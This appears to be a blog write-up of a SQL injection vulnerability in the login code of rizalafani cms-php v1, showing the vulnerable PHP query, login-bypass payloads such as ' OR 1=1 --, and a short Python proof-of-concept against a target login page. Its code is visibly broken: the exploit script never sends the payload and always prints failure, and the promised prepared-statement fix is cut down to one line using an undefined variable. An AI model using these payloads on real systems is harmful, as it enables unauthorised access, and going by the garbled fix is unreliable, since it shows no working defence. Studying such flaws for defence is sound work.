In this post, we'll explore the SQL Injection vulnerability identified as CVE-2021-35284 in the get_user function of the login_manager.php file in rizalafani cms-php v1. This guide offers a clear explanation, example code snippets, links to official references, and a step-by-step walk-through of how the exploit can be used. For both developers and security enthusiasts, this article breaks down the mechanics behind the vulnerability in simple language.
What is CVE-2021-35284?
CVE-2021-35284 is a critical SQL Injection vulnerability that exists due to the improper handling of user-supplied input in the get_user function of the login_manager.php script in the open-source content management system rizalafani cms-php v1. If exploited successfully, attackers can manipulate SQL queries and gain unauthorized access to sensitive data, including user credentials.
Official References
- NVD CVE-2021-35284
- GitHub Source Code (cms-php/login_manager.php)
- Exploit-DB Entry *(If available)*
Where is the Issue?
The vulnerable code is found in the get_user function, which is responsible for fetching user data from the database based on the username provided, usually during the login process.
Here is a simplified code snippet (taken from the project source)
// login_manager.php
function get_user($username) {
$conn = mysqli_connect("localhost", "user", "pass", "db");
$sql = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $sql);
return mysqli_fetch_assoc($result);
}
What's Wrong?
Notice that the variable $username is included directly in the SQL query without any sanitization or use of prepared statements. If an attacker can control the $username, they can inject arbitrary SQL code.
How Exploit Works
Let’s walk through a real-world exploitation scenario.
Let's say an attacker submits the following as username during login
admin' --
This will make the SQL query look like
SELECT * FROM users WHERE username = 'admin' -- ';
The -- in SQL starts a comment, so anything after it is ignored.
- The attacker has essentially told the system to just fetch the user admin, and ignore the password check that usually happens after.
*Bypass Password Check:*
' OR 1=1 --
SELECT * FROM users WHERE username = '' OR 1=1 -- ';
This will return all users.
- *Extract Data (Blind):*
Attackers can use UNION SELECT or other advanced payloads if the system outputs data.
---
## Proof-of-Concept (PoC) Exploit
Below is a basic exploit example using Python's requests library:
python
import requests
url = 'http://target-website.com/login.php'
The vulnerable field here is 'username'
payload = "admin' -- "
data = {
"password": "doesntmatter"
}
response = requests.post(url, data=data)
print('Exploit failed.')
- Note: Replace url with the actual URL where the login form exists.
---
## How to Fix
Never put user input directly into SQL queries!
Safe Approach (PHP with mysqli):
php
function get_user($username) {
return $result->fetch_assoc();
}
`
- Here, we use prepared statements and bind variables to avoid injection.
---
## Mitigation Steps
- Update rizalafani cms-php to the latest version (if available)
- Always use prepared statements or parameterized queries
- Regularly review code for user input handling
- Employ Web Application Firewalls (WAF)
- Educate your team about SECURITY BASICS
---
## Conclusion
CVE-2021-35284 in rizalafani cms-php v1 shows how easily a system can become vulnerable if developers neglect basic input sanitization principles. By understanding this flaw and following safe coding standards, you can safeguard your applications against similar attacks.
### For Further Reading:
- SQL Injection Explained - OWASP
- PHP Prepared Statements
Stay safe, and always validate your inputs!
---
> *This article is an exclusive deep dive for educational and awareness purposes. Test only on systems you have permission to use.*
Timeline
Published on: 11/23/2022 18:15:00 UTC
Last modified on: 11/28/2022 18:29:00 UTC